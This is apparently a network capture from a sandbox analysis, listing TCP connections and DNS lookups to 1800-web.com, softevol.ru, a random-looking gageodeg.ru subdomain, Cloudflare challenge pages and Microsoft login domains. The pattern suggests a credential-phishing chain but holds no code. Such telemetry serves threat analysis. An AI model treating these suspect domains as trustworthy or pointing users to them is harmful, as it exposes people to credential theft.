                                                                Jan 10, 2025 22:29:16.656328917 CET44349755104.21.16.1192.168.2.8
                                                                Jan 10, 2025 22:29:16.656352997 CET49755443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:16.656385899 CET49755443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:16.656729937 CET49756443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:16.656784058 CET44349756104.21.16.1192.168.2.8
                                                                Jan 10, 2025 22:29:16.656873941 CET49756443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:16.657114029 CET49756443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:16.657146931 CET44349756104.21.16.1192.168.2.8
                                                                Jan 10, 2025 22:29:17.117631912 CET44349756104.21.16.1192.168.2.8
                                                                Jan 10, 2025 22:29:17.117927074 CET49756443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:17.118007898 CET44349756104.21.16.1192.168.2.8
                                                                Jan 10, 2025 22:29:17.120982885 CET44349756104.21.16.1192.168.2.8
                                                                Jan 10, 2025 22:29:17.121054888 CET49756443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:17.121465921 CET49756443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:17.121556044 CET44349756104.21.16.1192.168.2.8
                                                                Jan 10, 2025 22:29:17.121622086 CET49756443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:17.121638060 CET44349756104.21.16.1192.168.2.8
                                                                Jan 10, 2025 22:29:17.170034885 CET49756443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:17.655425072 CET44349756104.21.16.1192.168.2.8
                                                                Jan 10, 2025 22:29:17.655666113 CET44349756104.21.16.1192.168.2.8
                                                                Jan 10, 2025 22:29:17.655745983 CET49756443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:17.656763077 CET49756443192.168.2.8104.21.16.1
                                                                Jan 10, 2025 22:29:17.656807899 CET44349756104.21.16.1192.168.2.8
                                                                Jan 10, 2025 22:29:42.539068937 CET4971680192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:29:42.543931007 CET8049716124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:29:42.545506954 CET4971780192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:29:42.550273895 CET8049717124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:29:55.956227064 CET49798443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:29:55.956262112 CET44349798142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:29:55.956361055 CET49798443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:29:55.956687927 CET49798443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:29:55.956702948 CET44349798142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:29:56.611923933 CET44349798142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:29:56.612426996 CET49798443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:29:56.612448931 CET44349798142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:29:56.612790108 CET44349798142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:29:56.613112926 CET49798443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:29:56.613190889 CET44349798142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:29:56.655519009 CET49798443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:29:57.955013037 CET4971680192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:29:57.955048084 CET4971780192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:29:57.960007906 CET8049716124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:29:57.960067987 CET4971680192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:29:57.960227966 CET8049717124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:29:57.960279942 CET4971780192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:30:06.517426968 CET44349798142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:30:06.517507076 CET44349798142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:30:06.517554045 CET49798443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:30:07.953638077 CET49798443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:30:07.953658104 CET44349798142.250.186.36192.168.2.8
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 10, 2025 22:28:51.538353920 CET53647131.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:28:51.595527887 CET53654251.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:28:52.746896982 CET53646941.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:28:55.905854940 CET5219053192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:28:55.906024933 CET5449553192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:28:55.914145947 CET53521901.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:28:55.914407969 CET53544951.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:28:57.393773079 CET5104053192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:28:57.394397020 CET4975353192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:28:57.413925886 CET5392353192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:28:57.414091110 CET5294353192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:28:57.455586910 CET53497531.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:28:57.526873112 CET53539231.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:28:57.528558016 CET53510401.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:28:57.548264027 CET53529431.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:28:59.232028961 CET5452153192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:28:59.232264042 CET5543853192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:28:59.332979918 CET53554381.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:28:59.498239994 CET53545211.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:01.226300001 CET5581853192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:01.226917982 CET6481153192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:01.227797031 CET5236953192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:01.228117943 CET6339853192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:01.228669882 CET6007753192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:01.228928089 CET6040353192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:01.233671904 CET53558181.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:01.233690023 CET53648111.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:01.234394073 CET53523691.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:01.235280991 CET53600771.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:01.235843897 CET53604031.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:01.235856056 CET53633981.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:01.962677956 CET5429853192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:01.962867975 CET5055153192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:01.968202114 CET6429753192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:01.968514919 CET5231553192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:01.969449043 CET53542981.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:01.969491005 CET53505511.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:01.975388050 CET53523151.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:01.975977898 CET53642971.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:02.605621099 CET6403353192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:02.605844021 CET5005353192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:02.609378099 CET5649053192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:02.609642029 CET4979453192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:02.612488985 CET53500531.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:02.612659931 CET53640331.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:02.616039038 CET53564901.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:02.616139889 CET53497941.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:04.335452080 CET6340353192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:04.335452080 CET5389753192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:04.342288971 CET53538971.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:04.342361927 CET53634031.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:09.850430965 CET53497751.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:14.657949924 CET5845853192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:14.658457994 CET6406853192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:14.670154095 CET53584581.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:14.788770914 CET53640681.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:16.010130882 CET5459753192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:16.010564089 CET5960453192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:16.028256893 CET5665653192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:16.028559923 CET6238653192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:16.165851116 CET53566561.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:16.166104078 CET53623861.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:17.072762966 CET5677553192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:17.073151112 CET6015453192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:17.111419916 CET53601541.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:19.096117020 CET5570053192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:19.096740961 CET6178953192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:19.130714893 CET53617891.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:20.167795897 CET4977953192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:20.168436050 CET5330453192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:20.175354004 CET53497791.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:20.176189899 CET53533041.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:25.359702110 CET53617541.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:29.156132936 CET53588621.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:31.521105051 CET138138192.168.2.8192.168.2.255
                                                                Jan 10, 2025 22:29:35.404407024 CET5427653192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:35.404766083 CET6546253192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:29:51.400434971 CET53651181.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:29:51.835938931 CET53634051.1.1.1192.168.2.8
                                                                Jan 10, 2025 22:30:04.343367100 CET6155453192.168.2.81.1.1.1
                                                                Jan 10, 2025 22:30:04.343550920 CET4931353192.168.2.81.1.1.1
                                                                TimestampSource IPDest IPChecksumCodeType
                                                                Jan 10, 2025 22:29:14.788844109 CET192.168.2.81.1.1.1c315(Port unreachable)Destination Unreachable
                                                                Jan 10, 2025 22:29:17.111721992 CET192.168.2.81.1.1.1c26f(Port unreachable)Destination Unreachable
                                                                Jan 10, 2025 22:29:19.130903959 CET192.168.2.81.1.1.1c26f(Port unreachable)Destination Unreachable
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 10, 2025 22:28:55.905854940 CET192.168.2.81.1.1.10xe4b7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:28:55.906024933 CET192.168.2.81.1.1.10x1a1bStandard query (0)www.google.com65IN (0x0001)false
                                                                Jan 10, 2025 22:28:57.393773079 CET192.168.2.81.1.1.10x390eStandard query (0)1800-web.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:28:57.394397020 CET192.168.2.81.1.1.10xb9bcStandard query (0)1800-web.com65IN (0x0001)false
                                                                Jan 10, 2025 22:28:57.413925886 CET192.168.2.81.1.1.10xd923Standard query (0)1800-web.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:28:57.414091110 CET192.168.2.81.1.1.10x7977Standard query (0)1800-web.com65IN (0x0001)false
                                                                Jan 10, 2025 22:28:59.232028961 CET192.168.2.81.1.1.10x972aStandard query (0)a89.softevol.ruA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:28:59.232264042 CET192.168.2.81.1.1.10xe46fStandard query (0)a89.softevol.ru65IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.226300001 CET192.168.2.81.1.1.10xefb7Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.226917982 CET192.168.2.81.1.1.10x2a4fStandard query (0)code.jquery.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.227797031 CET192.168.2.81.1.1.10x47e3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.228117943 CET192.168.2.81.1.1.10x2b17Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.228669882 CET192.168.2.81.1.1.10x3fbeStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.228928089 CET192.168.2.81.1.1.10x9c6eStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.962677956 CET192.168.2.81.1.1.10x567dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.962867975 CET192.168.2.81.1.1.10xcaaeStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.968202114 CET192.168.2.81.1.1.10x7d97Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.968514919 CET192.168.2.81.1.1.10xbc6cStandard query (0)code.jquery.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:02.605621099 CET192.168.2.81.1.1.10x5b94Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:02.605844021 CET192.168.2.81.1.1.10x58f7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:02.609378099 CET192.168.2.81.1.1.10xc560Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:02.609642029 CET192.168.2.81.1.1.10xbc3eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:04.335452080 CET192.168.2.81.1.1.10xaf85Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:04.335452080 CET192.168.2.81.1.1.10x677aStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:14.657949924 CET192.168.2.81.1.1.10x3f34Standard query (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ruA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:14.658457994 CET192.168.2.81.1.1.10xb5baStandard query (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru65IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.010130882 CET192.168.2.81.1.1.10x6a2fStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.010564089 CET192.168.2.81.1.1.10x1617Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.028256893 CET192.168.2.81.1.1.10x9895Standard query (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ruA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.028559923 CET192.168.2.81.1.1.10xc546Standard query (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru65IN (0x0001)false
                                                                Jan 10, 2025 22:29:17.072762966 CET192.168.2.81.1.1.10xc657Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:17.073151112 CET192.168.2.81.1.1.10x1e71Standard query (0)www.office.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:19.096117020 CET192.168.2.81.1.1.10x2d73Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:19.096740961 CET192.168.2.81.1.1.10x4e3cStandard query (0)www.office.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:20.167795897 CET192.168.2.81.1.1.10x670dStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:20.168436050 CET192.168.2.81.1.1.10x6ca3Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                Jan 10, 2025 22:29:35.404407024 CET192.168.2.81.1.1.10x69ddStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:35.404766083 CET192.168.2.81.1.1.10xb64dStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                Jan 10, 2025 22:30:04.343367100 CET192.168.2.81.1.1.10xfbc1Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:30:04.343550920 CET192.168.2.81.1.1.10xf4fStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 10, 2025 22:28:55.914145947 CET1.1.1.1192.168.2.80xe4b7No error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:28:55.914407969 CET1.1.1.1192.168.2.80x1a1bNo error (0)www.google.com65IN (0x0001)false
                                                                Jan 10, 2025 22:28:57.526873112 CET1.1.1.1192.168.2.80xd923No error (0)1800-web.com124.217.248.8A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:28:57.528558016 CET1.1.1.1192.168.2.80x390eNo error (0)1800-web.com124.217.248.8A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:28:59.332979918 CET1.1.1.1192.168.2.80xe46fNo error (0)a89.softevol.ru65IN (0x0001)false
                                                                Jan 10, 2025 22:28:59.498239994 CET1.1.1.1192.168.2.80x972aNo error (0)a89.softevol.ru172.67.147.10A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:28:59.498239994 CET1.1.1.1192.168.2.80x972aNo error (0)a89.softevol.ru104.21.79.184A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.233671904 CET1.1.1.1192.168.2.80xefb7No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.233671904 CET1.1.1.1192.168.2.80xefb7No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.233671904 CET1.1.1.1192.168.2.80xefb7No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.233671904 CET1.1.1.1192.168.2.80xefb7No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.234394073 CET1.1.1.1192.168.2.80x47e3No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.234394073 CET1.1.1.1192.168.2.80x47e3No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.235280991 CET1.1.1.1192.168.2.80x3fbeNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.235280991 CET1.1.1.1192.168.2.80x3fbeNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.235843897 CET1.1.1.1192.168.2.80x9c6eNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.235856056 CET1.1.1.1192.168.2.80x2b17No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.969449043 CET1.1.1.1192.168.2.80x567dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.969449043 CET1.1.1.1192.168.2.80x567dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.969491005 CET1.1.1.1192.168.2.80xcaaeNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.975977898 CET1.1.1.1192.168.2.80x7d97No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.975977898 CET1.1.1.1192.168.2.80x7d97No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.975977898 CET1.1.1.1192.168.2.80x7d97No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:01.975977898 CET1.1.1.1192.168.2.80x7d97No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:02.612488985 CET1.1.1.1192.168.2.80x58f7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:02.612659931 CET1.1.1.1192.168.2.80x5b94No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:02.612659931 CET1.1.1.1192.168.2.80x5b94No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:02.616039038 CET1.1.1.1192.168.2.80xc560No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:02.616039038 CET1.1.1.1192.168.2.80xc560No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:02.616139889 CET1.1.1.1192.168.2.80xbc3eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 10, 2025 22:29:04.342361927 CET1.1.1.1192.168.2.80xaf85No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:14.670154095 CET1.1.1.1192.168.2.80x3f34No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:14.670154095 CET1.1.1.1192.168.2.80x3f34No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:14.670154095 CET1.1.1.1192.168.2.80x3f34No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:14.670154095 CET1.1.1.1192.168.2.80x3f34No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:14.670154095 CET1.1.1.1192.168.2.80x3f34No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:14.670154095 CET1.1.1.1192.168.2.80x3f34No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:14.670154095 CET1.1.1.1192.168.2.80x3f34No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:14.788770914 CET1.1.1.1192.168.2.80xb5baNo error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru65IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.017039061 CET1.1.1.1192.168.2.80x6a2fNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.017064095 CET1.1.1.1192.168.2.80x1617No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.165851116 CET1.1.1.1192.168.2.80x9895No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.165851116 CET1.1.1.1192.168.2.80x9895No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.165851116 CET1.1.1.1192.168.2.80x9895No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.165851116 CET1.1.1.1192.168.2.80x9895No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.165851116 CET1.1.1.1192.168.2.80x9895No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.165851116 CET1.1.1.1192.168.2.80x9895No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.165851116 CET1.1.1.1192.168.2.80x9895No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:16.166104078 CET1.1.1.1192.168.2.80xc546No error (0)itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru65IN (0x0001)false
                                                                Jan 10, 2025 22:29:17.079612017 CET1.1.1.1192.168.2.80xc657No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:17.079612017 CET1.1.1.1192.168.2.80xc657No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:17.111419916 CET1.1.1.1192.168.2.80x1e71No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:17.111419916 CET1.1.1.1192.168.2.80x1e71No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:18.190195084 CET1.1.1.1192.168.2.80xe2e8No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:18.190195084 CET1.1.1.1192.168.2.80xe2e8No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:19.071527004 CET1.1.1.1192.168.2.80x40f4No error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:19.071527004 CET1.1.1.1192.168.2.80x40f4No error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:19.104569912 CET1.1.1.1192.168.2.80x2d73No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:19.104569912 CET1.1.1.1192.168.2.80x2d73No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:19.130714893 CET1.1.1.1192.168.2.80x4e3cNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:19.130714893 CET1.1.1.1192.168.2.80x4e3cNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:20.175354004 CET1.1.1.1192.168.2.80x670dNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
